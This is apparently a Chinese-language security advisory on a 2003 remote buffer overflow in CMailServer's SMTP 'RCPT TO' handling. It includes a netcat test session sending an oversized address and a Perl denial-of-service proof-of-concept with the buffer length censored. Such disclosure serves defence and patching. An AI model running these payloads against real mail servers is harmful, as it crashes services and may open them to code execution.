安全研究

安全漏洞
Youngzsoft CMailServer RCPT TO远程缓冲区溢出漏洞

发布日期:2003-05-10
更新日期:2003-05-15

受影响系统:
YoungZSoft CMailServer 4.0.2003.03.27
YoungZSoft CMailServer 4.0.2002.11.24
不受影响系统:
YoungZSoft CMailServer 4.0.2003.03.30
描述:
BUGTRAQ  ID: 7548

CMailServer是一款EMAIL服务程序,包含基于WEB的邮件服务系统。

CMailServer的SMTP服务程序对邮件的"RCPT TO"字段缺少正确缓冲区边界检查,远程攻击者可以利用这个漏洞对服务进行缓冲区溢出攻击,可能在系统上执行任意指令。

CMailServer的SMTP服务在解析EMAIL头字段时存在问题,如果攻击者构建的邮件"RCPT TO"字段超长,就会破坏内存,触发缓冲区溢出,精心构建提交数据可能在系统上执行任意指令。

<*来源:Dennis Rand (DER@cowi.dk
  
  链接:http://marc.theaimsgroup.com/?l=bugtraq&m=105258772101349&w=2
*>

测试方法:

警 告

以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!

Dennis Rand (DER@cowi.dk)提供了如下测试方法:

nc warlab.dk 25
220 ESMTP CMailServer 4.0.2003.03.27 SMTP Service Ready
HELO Foobar
250 win2k-serv
Mail From : admin@warlab.dk
250 <admin@warlab.dk> Sender Ok
Rcpt To: <aaaaa....[Buffer size 2000 Bytes @warlab.dk]
<connection closed>

#!/usr/bin/perl -w
##################
# ESMTP CMailServer 4.0.2003.03.27 SMTP Service DoS attack
#
# URL: http://www.infowarfare.dk/
# EMAIL: der@infowarfare.dk
# USAGE: sploit.pl <target ip>
#
# Summary:
#
# The problem is a Buffer Overflow in the SMTP protocol, within the
# ESMTP CMailServer, causing the service to shutdown
# It is then where we can actually overwrite the exception handler on the
stack allowing
# A system compromise with code execution running as SYSTEM.
#
#
# Ive censored some of the source code out. =)
#
# Solution:
# None at this time
#
#

use IO::Socket;
    
$target = shift() || "warlab.dk";
my $port = 25;
my $Buffer = "A" x <CENSORED> ; #


my $sock = IO::Socket::INET->new (
                                    PeerAddr => $target,
                                    PeerPort => $port,
                                    Proto => 'tcp'
                                 ) || die "could not connect: $!";

my $banner = <$sock>;
if ($banner !~ /^2.*/)
{
    print STDERR "Error: invalid server response '$banner'.\n";
    exit(1);
}

print $sock "HELO $target\r\n";
$resp = <$sock>;

print $sock "MAIL FROM: $Buffer\@$target.dk\r\n";
$resp = <$sock>;

print $sock "\r\n";
print $sock "\r\n\r\n\r\n\r\n\r\n\r\n";

close($sock);

建议:
厂商补丁:

YoungZSoft
----------
升级到ESMTP CMailServer 4.0.2003.03.30或之后版本:

http://www.youngzsoft.com

浏览次数:2864
严重程度:0(网友投票)
本安全漏洞由绿盟科技翻译整理,版权所有,未经许可,不得转载
绿盟科技给您安全的保障